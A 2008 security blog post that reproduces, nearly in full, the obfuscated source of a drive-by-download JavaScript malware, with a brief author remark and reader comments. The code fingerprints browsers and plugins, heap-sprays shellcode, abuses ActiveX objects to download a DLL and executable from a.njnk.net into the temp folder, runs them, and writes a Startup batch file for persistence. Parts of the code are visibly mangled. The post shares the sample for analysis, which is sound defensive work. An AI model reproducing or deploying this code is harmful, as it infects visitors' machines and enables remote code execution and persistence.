The 10.000 Sites JS Malware Source Code Leaked
Sat, 22 Mar 2008 07:16:50 GMT
This will be an old news if you are following Ronald's blog but nevertheless I've decided to make it public here as well, because the only way you can fight these menace is by sharing and dissecting. The malware is heavily obfuscated but not as much as it can get. In fact, just by glancing through the code you can see the key points of the execution process.
http://b.njnk.net:80/E/J.JS <http://b.njnk.net/E/J.JS>
var z1IlbQFl0X = 0;
var z1IlaxFl0X = 0;
var z1IlbPFl0X = 1;
var z1IlbiFl0X = 0;
var z1IlbCFl0X = 0;
var z1IlbHFl0X = 0;
var z1IlbIFl0X = 0;
var z1IlbfFl0X = "use" + "rid1" + "AF9122";
var z1IlbcFl0X = "20";
var z1IlaoFl0X = "a.n" + "jnk." + "net";
var z1IlbGFl0X = 0, z1IlbzFl0X = 0, z1IlaHFl0X = 0;
var z1IlaAFl0X = "";
var z1IlanFl0X = 0;
var z1IlapFl0X = 0, z1IlaOFl0X = 0, z1IlaKFl0X = 0, z1IlaLFl0X = 0;
var z1IlamFl0X = "n" + "one";
var z1IlcqFl0X;
var z1IlaSFl0X = 0;
{
if(z1IlbQFl0X) {
document.getElementsByTagName("bod" + "y") [ 0] .innerHTML += z1IlcFFl0X + "<b" + "r>";
}
}
{
if(z1IlbQFl0X) {
alert(z1IlcFFl0X);
}
}
function x0r1aU2Z(name) {
var z1IlaFFl0X = document.cookie;
var z1IlaJFl0X = name + "=";
if(! z1IlaFFl0X) {
return null;
}
var z1IlaDFl0X = z1IlaFFl0X.indexOf("; " + z1IlaJFl0X);
if(z1IlaDFl0X == - 1) {
z1IlaDFl0X = z1IlaFFl0X.indexOf(z1IlaJFl0X);
if(z1IlaDFl0X != 0) {
return null;
}
}
else {
z1IlaDFl0X += 2;
}
var z1IlbqFl0X = document.cookie.indexOf(";", z1IlaDFl0X);
if(z1IlbqFl0X == - 1) {
z1IlbqFl0X = z1IlaFFl0X.length;
}
return unescape(z1IlaFFl0X.substring(z1IlaDFl0X + z1IlaJFl0X.length, z1IlbqFl0X));
};
function x0r1aR2Z(name, value) {
var exp = new Date();
var z1IlbVFl0X = exp.getTime() + (365 * 1 * 24 * 60 * 60 * 1000);
exp.setTime(z1IlbVFl0X);
var z1IlbYFl0X = name + "=" + escape(value) + "; e" + "xpires" + "=" + exp.toGMTString();
document.cookie = z1IlbYFl0X;
};
function x0r1ax2Z(z1IlakFl0X, z1IlalFl0X) {
while(z1IlakFl0X.length * 2 < z1IlalFl0X) {
z1IlakFl0X += z1IlakFl0X;
}
z1IlakFl0X = z1IlakFl0X.substring(0, z1IlalFl0X / 2);
return z1IlakFl0X;
};
function z1IltFl0X() {
if(z1IlaSFl0X > 0) {
return;
}
try {
var z1IlbaFl0X = 0 x0c0c0c0c;
%" + "u" + "ee83%ufe3" + "a%u06" + "4e綍謄菎ᣁ諨%u" + "ffff%u"
+ "83ff%u0" + "c" + "c1Ƹ敮" + "%uc17" + "4ࣸ桐%" + "u6977楮" + "%udc"
+ "8b剑s" + "%u0" + "4" + "55奚%" + "ud08b%u" + "68e8" + "㏿%" + "u"
+ "50c0偐%u50" + "50嗿褜㑅" + "쀳偐偐嶍區%u75f" + "fT⁕%u458" + "9" + "%u"
+ "eb38㍴%u66c" + "0%u6c" + "b8偬%u7" + "1" + "68%u2e" + "31%" + "u8"
+ "964" + "づ%u" + "c033" + "%" + "ub050%u50" + "82%u02b" + "0㉐僀끐셀"
+ "ᣠp" + "%u30" + "75嗿" + "茈￸%" + "ud3" + "74%" + "u4589㌼%u66c"
+ "0%u0cb" + "8%u2b0" + "1诠" + "%u8df" + "4ў晓Ҹ" + "倁䚍%u50" + "08%u75"
+ "ffX%u24" + "55%u" + "468b%u85" + "04%u" + "74c0㌖%u50" + "c0%u46"
+ "8d倄盿%u8d" + "0" + "4" + "ࡆ" + "p㱵嗿" + "￐㱵" + "%u55f" + "f㌐%uff0"
+ "fふ%u55" + "ff%u8" + "304ી%u" + "ff50ᡕ%" + "uf7eb%" + "uf3e" + "8%u"
+ "ff" + "f" + "e" + "棿瑴㩰⼯⹡%u6" + "a6e%u" + "6b6e渮%u7" + "465%"
+ "u632f%u69" + "67%" + "u622d湩樯%u2" + "f6c%u" + "6c6a%u6" + "16"
+ "f敤" + "%" + "u2e72" + "汰" + "%u6" + "c3f慯晤汩㵥%u2f7" + "1" + "%"
+ "u" + "3171搮汬%u" + "f" + "fff");*var z1IlarFl0X = unescape("%"
+ "ueb55㍮%" + "u64c" + "0䂋蔰%u78c" + "0%u" + "560d%" + "u408b%" + "u"
+ "8b0cᱰ%" + "u8badࡀ%uc3" + "5e䂋" + "茴糀䂋쌼%u8b6" + "0%u2" + "46c"
+ "謤㱅%u7c" + "8b%u" + "78" + "05ﴃ例%u" + "8b18%u" + "20" + "5f�㏣%u8b"
+ "49" + "謴%u" + "f50" + "3쀳%uf" + "c99%" + "u84ac%u74c" + "0섇්퀃"
+ "%" + "uf4eb%u543" + "b⠤%ue27" + "5%u5" + "f" + "8b" + "̤曝ಋ譋ᱟ%udd"
+ "03ҋ%u03" + "8b觅%u" + "2444%u61" + "1" + "c굒%u" + "52" + "50ꧨ"
+ "%" + "u" + "89" + "ff茇" + "ࣄ잃" + "㬄痱쏬于%" + "uec0" + "e"
+ "%u17a" + "5%u7c" + "0" + "1%u7" + "91f%u" + "97fb࿽ﹲᚳ䦰�" + "䐩埨縏䮋%u5f"
+ "e" + "3%" + "u835e%u7" + "cec" + "%u4ce" + "8%" + "uffff%u8b"
+ "ff%uebd" + "0%ue8" + "0" + "5%uf" + "ff9%" + "ueb58赦"
+ "䁽肤%uf" + "f7e%u7" + "5ff%u4f" + "f9%u17f" + "6" + "
var z1IlaCFl0X = 0 x400000;
var z1IlaWFl0X = z1IlarFl0X.length * 2;
var z1IlalFl0X = z1IlaCFl0X - (z1IlaWFl0X + 0 x38);
var z1IlakFl0X = unescape("邐%u9" + "090邐%u9" + "090邐邐%" + "u9090%u9" + "09" + "0");
z1IlakFl0X = x0r1ax2Z(z1IlakFl0X, z1IlalFl0X);
z1IlaZFl0X = (z1IlbaFl0X - 0 x400000) / z1IlaCFl0X;
z1IlbyFl0X = new Array();
for(i = 0; i < z1IlaZFl0X; i++ ) {
z1IlbyFl0X[ i] = z1IlakFl0X + z1IlarFl0X;
}
z1IlaSFl0X = 1;
}
catch(e) {}
};
function x0r1aW2Z(z1IlavFl0X, n) {
var z1IlbvFl0X = null;
try {
eval("z1IlbvFl0X = z1IlavFl0X" + ".C" + "reat" + "eObject(n" + ")")
}
catch(e) {}
if(! z1IlbvFl0X) {
try {
eval("z1IlbvF" + "l0X = z1Ilav" + "Fl0X." + "Cre" + "ateObject(n, \"\"" + ")")
}
catch(e) {}
}
if(! z1IlbvFl0X) {
try {
eval("z1I" + "lbv" + "Fl0X" + " = z1" + "IlavFl0X.CreateObj" + "ect(n, \"\"," + " \"\")")
}
catch(e) {}
}
if(! z1IlbvFl0X) {
try {
eval("z1IlbvFl" + "0X = " + "z1IlavFl0X.GetObj" + "ect(" + "\"" + "\", n)")
}
catch(e) {}
}
if(! z1IlbvFl0X) {
try {
eval("z1Ilbv" + "Fl0X = z" + "1IlavFl0X.G" + "etO" + "bject" + "(n, \"\")")
}
catch(e) {}
}
if(! z1IlbvFl0X) {
try {
eval("z1Ilbv" + "Fl0" + "X = z1Ila" + "v" + "Fl0X.GetObject(n)")
}
catch(e) {}
}
return(z1IlbvFl0X);
};
function x0r1aN2Z(xml, z1IlavFl0X, url, z1IlczFl0X) {
xml.open("GET", url, false);
xml.send(null);
var z1IlcGFl0X = xml.responseBody;
z1IlavFl0X.Type = 1;
z1IlavFl0X.Mode = 3;
z1IlavFl0X.Open();
z1IlavFl0X.Write(z1IlcGFl0X);
z1IlavFl0X.SaveToFile(z1IlczFl0X, 2);
z1IlavFl0X.Close();
};
function x0r1bd2Z(z1IlavFl0X, z1IlbZFl0X, z1IlcaFl0X) {
try {
z1IlavFl0X.Type = 2;
z1IlavFl0X.Mode = 3;
z1IlavFl0X.Charset = "Win" + "dows-" + "1251";
z1IlavFl0X.Open();
z1IlavFl0X.WriteText(z1IlbZFl0X);
z1IlavFl0X.SaveToFile(z1IlcaFl0X, 2);
z1IlavFl0X.Close();
}
catch(z1IlcKFl0X) {}
};
function z1IlEFl0X(a) {
var z1IlbmFl0X = "/cgi-b" + "in/" + "jl/jload" + "er.pl?load" + "file=q";
var z1IlaMFl0X = x0r1aW2Z(a, "m" + "sxml2.XM" + "LHTTP");
if(! z1IlaMFl0X) {
z1IlaMFl0X = x0r1aW2Z(a, "Microsoft" + ".XMLHTT" + "P");
}
var z1IlbbFl0X = x0r1aW2Z(a, "adodb" + ".st" + "ream");
var s = x0r1aW2Z(a, "WScript" + ".Shel" + "l");
var e = s.Environment("Proce" + "ss");
var z1IlckFl0X = "ht" + "tp://" + z1IlaoFl0X + z1IlbmFl0X + "/q" + "1.dll";
var z1IlcgFl0X = "http" + "://" + z1IlaoFl0X + z1IlbmFl0X + "/q" + "2l.jpg";
var z1IlcCFl0X = e.Item("TE" + "MP") + "\\q1.dl" + "l";
var z1IlclFl0X = e.Item("TEM" + "P") + "\\q2l." + "exe";
var z1IlcHFl0X = e.Item("PROGRAM" + "FIL" + "ES");
x0r1aN2Z(z1IlaMFl0X, z1IlbbFl0X, z1IlckFl0X, z1IlcCFl0X);
x0r1aN2Z(z1IlaMFl0X, z1IlbbFl0X, z1IlcgFl0X, z1IlclFl0X);
var z1IlbLFl0X = "\"" + z1IlclFl0X + "\"" + " \"" + z1IlcCFl0X + "\"" + "
\"" + z1IlcHFl0X + "\\I" + "nternet Exp" + "lorer\\ie" + "xp" + "lore.exe\"";
x0r1bd2Z(z1IlbbFl0X, "@ech" + "o" + " off\n" + z1IlbLFl0X + "\n",
e.Item("USERP" + "RO" + "FILE") + "\\Start M" + "enu\\Pr" + "og" +
"rams\\Startup\\sta" + "rtu" + "p.bat");
try {
s.run(z1IlbLFl0X);
return true;
}
catch(e) {}
return false;
};
function x0r1aH2Z() {
if(navigator.userAgent.indexOf("Oper" + "a") == - 1 && navigator.userAgent.indexOf("Firefo" + "x") == - 1 && navigator.userAgent.indexOf("M" + "SIE") != - 1 && navigator.userAgent.indexOf("W" + "indows") != - 1) {
z1IlaOFl0X = x0r1aQ2Z();
z1IlapFl0X = x0r1aI2Z();
return "ie";
}
if(navigator.userAgent.indexOf("Firefo" + "x") != - 1) {
return "firefo" + "x";
}
if(navigator.userAgent.indexOf("O" + "pera") != - 1) {
return "oper" + "a";
}
return "unkno" + "wn";
};
function x0r1an2Z() {
z1IlatFl0X = document.createElement("DIV");
z1IlatFl0X.id = "z1I" + "latF" + "l0X";
z1IlatFl0X.addBehavior("#" + "default#cli" + "entCaps");
document.body.appendChild(z1IlatFl0X);
};
function z1IlIFl0X() {
var version = 0, qt_control;
if(z1IlaAFl0X == "ie") {
try {
qt_control = new ActiveXObject('QuickTime.QuickTime');
}
catch(e) {
return 0;
}
delete qt_control;
if(z1IlapFl0X < 700) {
try {
var qt_check = new ActiveXObject('QuickTimeCheckObject.QuickTimeCheck');
version = (qt_check.z1IlblFl0X & 0 xffff0000) >> 16;
delete qt_check;
}
catch(e) {}
}
else {
version = 0 x100;
}
}
else {
if(navigator.plugins != null && navigator.plugins.length > 0) {
var plugin_str = null;
for(var i = 0; i < navigator.plugins.length; i++ ) {
var z1IlaPFl0X = navigator.plugins[ i];
if(z1IlaPFl0X.name.indexOf("QuickTim" + "e") > - 1) {
plugin_str = z1IlaPFl0X.name;
}
}
var z1IlcDFl0X = /[\d.]+/ g;
var z1IlceFl0X = z1IlcDFl0X.exec(plugin_str);
var z1IlaFl0X = z1IlceFl0X[ 0] .split(".");
version = (parseInt(z1IlaFl0X[ 0] ) << 8) + (parseInt(z1IlaFl0X[ 1] ) << 4);
if(z1IlaFl0X.length > 2) {
version += parseInt(z1IlaFl0X[ 2] );
}
}
}
return version;
};
function x0r1aQ2Z() {
var z1IlbdFl0X, z1IlaRFl0X;
var z1IlaBFl0X;
try {
x0r1an2Z();
z1IlaRFl0X = z1IlatFl0X.getComponentVersion("{89820" + "200-" +
"ECBD-11CF" + "-8" + "B85-00AA005B4383}", "compo" + "nent" + "id");
z1IlbdFl0X = z1IlaRFl0X.split(",");
z1IlbsFl0X = parseInt(z1IlbdFl0X[ 0] ) * 10000000000 +
parseInt(z1IlbdFl0X[ 1] ) * 100000000 + parseInt(z1IlbdFl0X[ 2] ) * 10000 + parseInt(z1IlbdFl0X[ 3] );
}
catch(e) {
z1IlbsFl0X = 0;
}
return z1IlbsFl0X;
};
function x0r1aI2Z() {
var z1IlbdFl0X, z1IlaRFl0X;
var z1IlaBFl0X = 0;
try {
if(! z1IlatFl0X) {
x0r1an2Z();
}
z1IlaRFl0X = z1IlatFl0X.getComponentVersion("{898202" + "00-ECBD-11CF-8B85-00" + "AA" + "005B4383" + "}", "c" + "ompon" + "entid");
z1IlbdFl0X = z1IlaRFl0X.split(",");
z1IlaBFl0X = parseInt(z1IlbdFl0X[ 0] ) * 100 + parseInt(z1IlbdFl0X[ 1] );
}
catch(e) {
var z1IlcDFl0X = /MSIE\s+(\d+)\.(\d+)/;
var z1IlbjFl0X = new Array;
if(z1IlbjFl0X = z1IlcDFl0X.exec(navigator.userAgent)) {
z1IlaBFl0X = parseInt(z1IlbjFl0X[ 1] ) * 100 + parseInt(z1IlbjFl0X[ 2] );
}
}
return z1IlaBFl0X;
};
function x0r1aD2Z() {
var z1IlasFl0X, z1IlbdFl0X;
var z1IlbrFl0X = "", z1IlaBFl0X = 0;
z1IlbXFl0X = /\sFirefox\/([\d\.]+)\b/;
z1IlasFl0X = z1IlbXFl0X.exec(navigator.userAgent);
if(! z1IlasFl0X) {
return 0;
}
z1IlbdFl0X = z1IlasFl0X[ 1] .split(".");
z1IlaBFl0X = (parseInt(z1IlbdFl0X[ 0] ) * 1000000) + (parseInt(z1IlbdFl0X[ 1] ) * 10000);
if(z1IlbdFl0X.length > 2) {
z1IlaBFl0X += parseInt(z1IlbdFl0X[ 2] ) * 100;
}
if(z1IlbdFl0X.length > 3) {
z1IlaBFl0X += parseInt(z1IlbdFl0X[ 3] );
}
return z1IlaBFl0X;
};
function x0r1aJ2Z() {
var z1IlasFl0X;
var z1IlbnFl0X = 0;
z1IlbXFl0X = /Windows\sNT\s(\d)\.(\d)/;
z1IlasFl0X = z1IlbXFl0X.exec(navigator.userAgent);
if(! z1IlasFl0X) {
z1IlbXFl0X = /Windows\s98/;
z1IlasFl0X = z1IlbXFl0X.exec(navigator.userAgent);
if(z1IlasFl0X) {
z1IlbnFl0X = 48;
return z1IlbnFl0X;
}
return 0;
}
z1IlbnFl0X = parseInt(z1IlasFl0X[ 1] ) * 10 + parseInt(z1IlasFl0X[ 2] );
return z1IlbnFl0X;
};
function x0r1aE2Z(z1IlbOFl0X) {
var z1IlcIFl0X = document.getElementById("z1" + "IlbeFl" + "0X");
z1IlcIFl0X.src = z1IlbOFl0X;
return true;
};
function x0r1au2Z(z1IlbRFl0X) {
var iframe = document.getElementById("z1Il" + "aE" + "Fl0X");
iframe.src = z1IlbRFl0X;
return true;
};
function x0r1av2Z() {
if(z1IlaxFl0X) {
return true;
}
x0r1aE2Z("http" + "://" + z1IlaoFl0X + "/E/isci/isc" + "i_my" + ".js");
};
function x0r1aT2Z() {
if(z1IlaxFl0X) {
return true;
}
x0r1au2Z("http:" + "//" + z1IlaoFl0X + "/E/ff1" + "04/" + "ff104.htm");
};
function x0r1aS2Z() {
if(z1IlaxFl0X) {
return true;
}
x0r1au2Z("http:" + "//" + z1IlaoFl0X + "/E/ff15" + "4/ff154" + ".htm");
};
function x0r1aB2Z() {
if(z1IlbIFl0X > 0) {
return false;
}
if(z1IlaxFl0X) {
return true;
}
z1IltFl0X();
x0r1au2Z("http:" + "//" + z1IlaoFl0X + "/E/vm" + "l/vml" + ".htm");
};
function x0r1aG2Z() {
if(z1IlbHFl0X > 0) {
return false;
}
if(z1IlaxFl0X) {
return true;
}
z1IltFl0X();
x0r1au2Z("http:" + "//" + z1IlaoFl0X + "/E" + "/" + "ani/ani5.htm");
};
function x0r1az2Z() {
var z1IlbEFl0X = 0;
var z1IlctFl0X = false;
if(z1IlbiFl0X > 0) {
return false;
}
if(z1IlaxFl0X) {
return true;
}
var z1IlbpFl0X = new Array("{BD" + "9" + "6" +
"C556-65A3-11D0-983A-00C04FC2" + "9E30}", "{A" + "B9BCEDD-EC" +
"7E-47E1-9322-D4A210617" + "116" + "}", "{00" + "06F033-" + "0000-0000-C0" +
"00" + "-000000000046}", "{0006F03A-" + "00" + "00-000" + "0-C000-000" +
"000000046}", "{6" + "e" + "32070a-766d-4" + "ee6-879c-dc1fa" + "91d2fc3}",
"{6414512B-B978-" + "45" + "1D-A0D8-FCF" + "DF33E" + "833C}", "{7F5B7F63-F0" +
"6F-4" + "33" + "1-8A26-" + "339E03C0AE3D}", "{06723E09-F4" + "C2-" +
"43c8-8358-09FCD1" + "DB" + "0766}", "{639F725F-1" + "B2D-4831-A9" + "FD-874" +
"84768" + "2010}", "{BA" + "0185" + "99-1" + "DB3-44f9-83" + "B4-461454C84BF8}", "{D0C07D56-7C69-43" + "F1" + "-B4A0-25F5A11F" + "AB1" +
"9}", "{E8CCCDDF-CA2" + "8-" + "496" + "b-B050-" + "6C07C962476B}", "{BD96C5" +
"56-6" + "5A3-11D" + "0-9" + "83A-00C04FC29E36}", null);
while(z1IlbpFl0X[ z1IlbEFl0X] ) {
var z1IlbFFl0X = null;
z1IlbFFl0X = document.createElement("objec" + "t");
z1IlbFFl0X.setAttribute("clas" + "sid", "clsi" + "d:"
+ z1IlbpFl0X[ z1IlbEFl0X] .substring(1, z1IlbpFl0X[ z1IlbEFl0X] .length - 1));
if(z1IlbFFl0X) {
try {
var z1IlcvFl0X = x0r1aW2Z(z1IlbFFl0X, "S" + "hell." + "Application");
if(z1IlcvFl0X) {
z1IlctFl0X = z1IlEFl0X(z1IlbFFl0X);
return z1IlctFl0X;
}
}
catch(e) {}
}
z1IlbEFl0X++;
}
return false;
};
function z1IlNFl0X() {
if(z1IlbCFl0X > 0) {
return false;
}
if(z1IlaxFl0X) {
return true;
}
if(z1IlaKFl0X == 0) {
return false;
}
if(z1IlaKFl0X > 0 x730) {
return false;
}
z1IltFl0X();
if(z1IlaAFl0X == "ie") {
document.getElementById("tmp_d" + "iv1").innerHTML = "<object "
+ "CL" + "ASS" + "ID" + "=\"clsid:02BF25D" + "5-8" + "C17-4B23"
+ "-BC80-D" + "3488ABD" + "DC6B\" widt" + "h=\"0\" height=" + "\"0\" "
+ "s" + "tyle=\"border:0px\"><par" + "am name=\"src\"" + " value=\"http://"
+ z1IlaoFl0X + "/E/pl.mo" + "v\">" + "<param na" + "me" + "=\"autopla"
+ "y\" value=\"" + "true\"><param n" + "ame=\"l" + "oop\" v"
+ "alue=\"false\"" + "><param" + " name=\"controller\" v" + "alue="
+ "\"t" + "rue\"></obj" + "ect>";
}
else {
document.getElementById("tmp_di" + "v1").innerHTML = "<embed "
+ "s" + "rc=\"ht" + "tp://" + z1IlaoFl0X + "/E/pl.mov\" wi"
+ "dth=\"1\" hei" + "ght=\"1\" " + "l" + "oop=\"" + "f" + "alse\" "
+ "autopl" + "ay=\"true\">";
}
return true;
};
function z1IlaiFl0X() {
for(var i = 0; i < 100000; i++ ) {
var n = i;
}
};
function x0r1X2Z() {
if(z1IlNFl0X()) {
if(z1IlaAFl0X == "ie") {
if(! z1IlaLFl0X) {
setTimeout("x0r1" + "aG2Z(" + ");", 2000);
setTimeout("x0r1aB2" + "Z(" + ");", 4000);
}
else {
setTimeout("x" + "0r1" + "aB2Z();", 2000);
x0r1aB2Z();
}
}
return;
}
if(z1IlaAFl0X == "ie") {
if(z1IlanFl0X == 48 || z1IlapFl0X < 600) {
x0r1aB2Z();
return;
}
if(! z1IlaLFl0X) {
x0r1aG2Z();
setTimeout("x0r1a" + "B2Z()" + ";", 4000);
}
else {
x0r1aB2Z();
}
}
};
function x0r1aC2Z() {
url = "htt" + "p://" + z1IlaoFl0X + "/cgi-bin/" + "jl/jloa" + "der"
+ ".pl?" + "source=" + location.hostname + "&syste" + "m_i" + "d="
+ z1IlamFl0X + "&qtver=0" + "x" + z1IlaKFl0X.toString(16);
if(z1IlaAFl0X == "ie") {
url = url + "&iebuild" + "=" + z1IlaOFl0X + "&av_id" + "=" + z1IlaLFl0X;
}
try {
var z1IlcJFl0X = document.getElementById("serv" + "_note_l" + "ink");
z1IlcJFl0X.src = url;
}
catch(e) {};
};
z1IlbSFl0X = [ "NA" + "VCfgWizDll.N" + "AVCfg" + "WizMgr", "McGD" + "Mgr.DwnldGroup" + "Mg" + "r"];
z1IlbTFl0X = [ "48F45200-91E6-11CE-8A4F-0" + "0" + "8" + "0C81A28D" + "4",
"091EB208-39DD-417D-" + "A5D" + "D-7" + "E2C2" + "D8FB9CB", "D653647D-" +
"D607-4" + "DF6-A5B8-4" + "8D2BA" + "195F7B", "9F97547E-4" + "609-" + "4" +
"2C5-AE0C-81C61F" + "FAEBC3", "65756541-C6" + "5C-11C" + "D-0000-4B656E69" +
"61" + "00", "1474F601-" + "9B4B-" + "4EB0-81F" + "A-20F753" + "C0E1A4", "D5" +
"5" + "0702" + "0-DB45-1" + "1d1-A5F0-00600872F78D", "D" + "D2" +
"30880-495A-11D1-B064-0" + "08048" + "EC2FC5", "B089FE88-FB5" + "2" +
"-11D3-BDF1-005" + "0DA3415" + "0D", "472083B0-C5" + "22-11CF-8" + "7" +
"63-00608CC02F2" + "4", "45AC2688" + "-0253-4" + "ED8-97" + "DE-B" +
"5370FA7D48A", "893" + "4FCEF-F5B8-468" + "F-9" + "51" + "F-78A921CD3920",
"1EB2409C" + "-6E28-" + "4066-9738-9" + "7A1B8F5" + "639C", "E75" +
"93602-124B-" + "47" + "C9-9F" + "73-A69308EDC973", "B43CB0C0-84F2-1" + "1D6-A"
+ "18E-00C0DF0" + "43" + "BA4"];
function x0r1aK2Z(i) {
z1IlbGFl0X++;
z1IlbTFl0X[ i] = null;
};
function x0r1aF2Z(i) {
z1IlbzFl0X++;
if(z1IlaHFl0X) {
return;
}
if(z1IlbTFl0X[ i] != null) {
z1IlaLFl0X = z1IlbSFl0X.length + i + 1;
z1IlaHFl0X = 1;
}
};
function x0r1aM2Z() {
var z1IlcsFl0X = "";
try {
var z1IlcuFl0X = 0;
for(i = 0; i < z1IlbSFl0X.length && ! z1IlaLFl0X; i++ ) {
try {
new ActiveXObject(z1IlbSFl0X[ i] );
z1IlaLFl0X = i + 1;
z1IlaHFl0X = 1;
}
catch(e) {};
}
if(z1IlaLFl0X) {
return 1;
}
for(i = 0; i < z1IlbTFl0X.length; i++ ) {
z1IlcsFl0X += "<o" + "bjec" + "t classid=" + "'clsid:" +
z1IlbTFl0X[ i] + "'" + " o" + "nerror='x0" + "r1aK2Z(" + i + ")' onreadystatecha" + "nge='" + "x0" + "r1aF2Z" + "(" + i + ")" + "'><"
+ "/objec" + "t>";
}
document.createElement("div").innerHTML = z1IlcsFl0X;
}
catch(e) {};
if(z1IlaLFl0X) {
return 1;
}
return 0;
};
function x0r1aP2Z() {
for(var i = 0; i < 10000; i++ ) {
var n = i;
}
if(! z1IlbQFl0X && z1IlbPFl0X) {
try {
if(x0r1aU2Z(z1IlbfFl0X) == z1IlbcFl0X) {
return false;
}
}
catch(e) {};
}
z1IlanFl0X = x0r1aJ2Z();
z1IlaAFl0X = x0r1aH2Z();
z1IlaKFl0X = z1IlIFl0X();
var tmp_div = document.createElement("DIV");
tmp_div.id = "tmp_di" + "v1";
document.body.appendChild(tmp_div);
var z1IlazFl0X = document.createElement("IFRAM" + "E");
z1IlazFl0X.id = "serv_" + "note" + "_link";
z1IlazFl0X.border = 0;
z1IlazFl0X.frameborder = 0;
z1IlazFl0X.width = 0;
z1IlazFl0X.height = 0;
document.body.appendChild(z1IlazFl0X);
var z1IlaEFl0X = document.createElement("IFRA" + "ME");
z1IlaEFl0X.id = "z" + "1I" + "laEFl0X";
z1IlaEFl0X.border = 0;
z1IlaEFl0X.frameborder = 0;
z1IlaEFl0X.width = 0;
z1IlaEFl0X.height = 0;
document.body.appendChild(z1IlaEFl0X);
var z1IlbeFl0X = document.createElement("SCRIP" + "T");
z1IlbeFl0X.id = "z1Il" + "beF" + "l0X";
document.body.appendChild(z1IlbeFl0X);
if(z1IlaAFl0X == "ie" && z1IlanFl0X != 0) {
if(z1IlapFl0X >= 700 && z1IlapFl0X < 800) {
if(z1IlanFl0X < 60) {
z1IlamFl0X = "i" + "e7_xp";
}
else {
z1IlamFl0X = "ie7_" + "vista";
}
}
else if(z1IlapFl0X >= 600 && z1IlapFl0X < 700) {
if(z1IlanFl0X == 50) {
z1IlamFl0X = "ie6_2" + "k";
}
else if(z1IlanFl0X == 51) {
if(z1IlaOFl0X >= 60029002180) {
z1IlamFl0X = "ie" + "6_xpsp2";
}
else if(z1IlaOFl0X >= 60028001106) {
z1IlamFl0X = "ie" + "6_xpsp1";
}
else if(z1IlaOFl0X == 60026000000) {
z1IlamFl0X = "ie6" + "_xpsp0";
}
else {
z1IlamFl0X = "ie" + "6_xp";
}
}
else if(z1IlanFl0X == 48) {
z1IlamFl0X = "ie6_w" + "in98";
}
else {
z1IlamFl0X = "ie6_" + "u" + "nknown";
}
}
else if(z1IlapFl0X >= 500 && z1IlapFl0X < 600) {
if(z1IlanFl0X == 50) {
z1IlamFl0X = "ie" + "5_2k";
}
else if(z1IlanFl0X < 50) {
z1IlamFl0X = "i" + "e5_nt";
}
}
else {
z1IlamFl0X = "ie_unkn" + "o" + "wn";
}
if(z1IlapFl0X < 700) {
x0r1aM2Z();
}
else {
z1IlaLFl0X = - 1;
}
}
if(z1IlaAFl0X == "fir" + "efox" && z1IlanFl0X != 0) {
var z1IlawFl0X = 0;
z1IlawFl0X = x0r1aD2Z();
if(z1IlawFl0X <= 1000400) {
z1IlamFl0X = "ff" + "104";
}
if(z1IlawFl0X > 1000400 && z1IlawFl0X <= 1050004) {
z1IlamFl0X = "ff" + "150";
}
z1IlamFl0X = "ff";
}
x0r1aV2Z();
};
function x0r1ay2Z(z1IlcdFl0X) {
window.status = z1IlcdFl0X;
};
function x0r1aV2Z() {
z1IlaHFl0X = 1;
x0r1aC2Z();
x0r1ay2Z("Openin" + "g " + window.location.href + "...");
setTimeout("x" + "0r1ay2Z('Done'" + ")", 30000);
try {
x0r1aR2Z(z1IlbfFl0X, z1IlbcFl0X);
}
catch(e) {};
var z1IlbgFl0X = false;
switch(z1IlamFl0X) {
case "ie7_x" + "p" : z1IlNFl0X();
break;
case "ie6_" + "xpsp0" : case "ie6" + "_2k" : case "ie6_xpsp" + "1" :
case "ie6_xp" + "sp2" : case "ie" + "6_xp" : case "ie6_un" + "know" + "n" :
case "i" + "e6_win98" : case "ie5_" + "2k" : case "ie5" + "_nt" :
case "ie5_unkno" + "w" + "n" : case "i" + "e_unk" + "nown" : try {
z1IlbgFl0X = x0r1az2Z();
}
catch(e) {}
if(! z1IlbgFl0X) {
x0r1X2Z();
}
break;
case "ff" + "104" : x0r1aT2Z();
break;
case "ff1" + "50" : x0r1aS2Z();
break;
case "ff" : z1IlNFl0X();
default : break;
}
};
if(document.addEventListener) {
document.addEventListener("DOMC" + "ontentLoade" + "d", x0r1aP2Z, false);
}
else {
document.write("<scr" + "ipt id=__ie_onload defe" + "r" + " src=javascr" + "ipt:v" + "o" + "id(0)><\/scri" + "pt>");
var script = document.getElementById("__ie" + "_onlo" + "ad");
script.onreadystatechange = function() {
if(this.readyState == "c" + "omplete") {
x0r1aP2Z();
}
};
}
Don't get too excited about this source as it is useless. In fact there is nothing interesting about it. There are a few interesting things you can learn but this is how much it goes. To me, it seems like a wrapper around the real things. In fact it is a wrapper around a drive-by-download attack. But don't take my word for it. Have a look yourselves.
Archived Comments
meathive
I left a message for Ronald regarding a similar find for an obscured PHP backdoor: https://kinqpinz.info/lib/2008/mar/#c61a1757
Hope this is not too off topic. ;]
When i read this rss from your blog my NOD32 show me malware allert.
I think becouse this page have sample of malware code... and NOD32 think malware is present on code page.
Edgar from Bangkok
Now, i add screenshot about problem over my Security Internet Blog at post
http://edetools.blogspot.com/2008/03/curiosita.html
Edagr from Bangkok
Edgar, this case confirms that modern technologies cannot make sense of Web/Client-side attacks and vulnerabilities. They are shooting in the dark by performing a global match against a signature without verifying if that signature is actually within an executable block. Thanks for letting us know. It is an excellent example I can use for future reference.
Edgar, I din't get that problem at all though I was using NOD 32 total security. Mine went fine and normal like before.
Hola Pdp ,
SuperCool talk ,
JS code still show bad functions like :
.WriteText(
.SaveToFile(
etc. which can use only as a payload after exploit run
DrorWell, actually files that are being placed on someone's PC is the least I'm interested in, since that isn't important. The code above shows us that is makes use of heap spraying to execute shellcode, which is more important to analyze than the next bat file, which is a no-brainer anyway.
Bharadwaj, i use NOD32 2,5 old version
I think, maybe i have allert NOD 32, becouse i set ON all the Threat Sense Scanning engine option
Thanks for the post. I was searching for an example . Just wish people would keep their MS servers patched, as it would make it a better environment for the normal web surfer.
Jason